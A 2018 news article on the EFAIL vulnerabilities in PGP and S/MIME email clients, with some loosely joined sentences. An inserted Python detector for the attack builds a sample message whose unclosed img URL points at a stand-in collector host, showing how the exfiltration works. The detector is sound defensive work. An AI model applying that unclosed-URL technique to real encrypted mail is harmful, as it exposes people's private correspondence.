Critical Flaw Found in PGP and S/MIME Email Clients Like Apple Mail

14 May, 2018, 20:42 | Author: Shawn Conner

Security researchers have discovered two means of getting the decrypted information out of the message, and all they require is a copy of the encrypted message.

He said the vulnerabilities "might reveal the plaintext of encrypted emails, including encrypted emails sent in the past" and that there are no current fixes available. EFAIL basically strips those protections and lets attackers read encrypted messages regardless of who sent them, how long ago they were sent, or how they were initially compromised. ProtonMail itself has verified that it is not vulnerable to EFAIL. Separate guides have also been provided for disabling PGP plugins in Thunderbird, Apple Mail, and Outlook.

A professor of computer science has warned users of Pretty Good Privacy (PGP) that the encryption program has vulnerabilities and should be immediately disabled. To prevent a breach, users need to secure access to their mailboxes and prevent their email clients from loading HTML code from external websites.

In their paper, researchers noted that "while it is necessary to change the OpenPGP and S/MIME standards to fix these vulnerabilities, some clients had even more severe implementation flaws allowing straightforward exfiltration of the plaintext". According to the researchers, both the CFB and CBC modes of operation enable an attacker to reorder, remove or insert ciphertext blocks, or to perform meaningful plaintext modifications without the encryption key. In the meantime, researchers are advising users to rely on end-to-end encrypted messaging apps instead.


The researchers indicate that updates are needed for OpenPGP and S/MIME to fully address the issue.

"In the most straightforward example of our attacks, the adversary prepares a plaintext email structure that contains an img element, whose URL is not closed with quotes", the researchers wrote.

The attacker would then have to send the contents of that encrypted email back to its owner, the victim, in a carefully crafted way that makes email clients treat it as HTML.
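A defensive check for the message shape described above, as an added example that is not from the researchers' paper or the original article: it flags mail in which an HTML part ends inside an unclosed `img` `src` attribute and a later MIME part carries S/MIME or PGP ciphertext. The function names, the boundary and the `.example` hosts are assumptions, and the sample message is constructed.

```python
import re
from email import message_from_string

# <img ... src=" (or ') whose opening quote is never closed before the part ends.
UNCLOSED_SRC = re.compile(r"""<img\b[^>]*\bsrc\s*=\s*(["'])(?:(?!\1).)*\Z""", re.I | re.S)
ENCRYPTED_TYPES = {"application/pkcs7-mime", "application/x-pkcs7-mime",
                   "application/pgp-encrypted"}

def is_encrypted_part(part):
    """True for S/MIME or PGP/MIME parts and for inline ASCII-armored PGP."""
    if part.get_content_type() in ENCRYPTED_TYPES:
        return True
    payload = part.get_payload(decode=True) or b""
    return b"-----BEGIN PGP MESSAGE-----" in payload

def efail_suspect(raw_message):
    """Flag an HTML part that ends inside an open src attribute and precedes ciphertext."""
    msg = message_from_string(raw_message)
    leaves = [p for p in msg.walk() if not p.is_multipart()]
    for i, part in enumerate(leaves):
        if part.get_content_type() != "text/html":
            continue
        html = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        if UNCLOSED_SRC.search(html) and any(is_encrypted_part(p) for p in leaves[i + 1:]):
            return True
    return False

def build_sample(first_html):
    """Constructed three-part message: HTML, ciphertext placeholder, HTML."""
    sep = "--B\n"
    return ("MIME-Version: 1.0\n"
            "Content-Type: multipart/mixed; boundary=\"B\"\n\n"
            + sep + "Content-Type: text/html\n\n" + first_html + "\n"
            + sep + "Content-Type: application/pkcs7-mime; smime-type=enveloped-data\n"
            "Content-Transfer-Encoding: base64\n\n"
            "Q09OU1RSVUNURUQ=\n"  # base64 of the word CONSTRUCTED, not real ciphertext
            + sep + "Content-Type: text/html\n\n\">\n--B--\n")

if __name__ == "__main__":
    # Unclosed src followed by an encrypted part: flagged.
    print(efail_suspect(build_sample('<img src="http://collector.example/')))
    # Same layout with a properly closed img tag: not flagged.
    print(efail_suspect(build_sample('<img src="https://www.example.org/logo.png">')))
```

A mail gateway or triage script can run `efail_suspect` over the raw RFC 822 text of inbound messages; a hit is a reason to quarantine the message rather than proof of an attack.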

The most serious vulnerabilities have been present in Thunderbird, macOS Mail, and Outlook for more than 10 years and remain unfixed at the moment, the researchers said. They do note, however, that disabling HTML rendering won't completely stop EFAIL attacks. "Disabling the presentation of incoming HTML emails in your email client will close the most prominent way of attacking Efail".

The importance of email encryption went mainstream after whistleblower Edward Snowden revealed the extent of the US government's electronic surveillance in 2013.
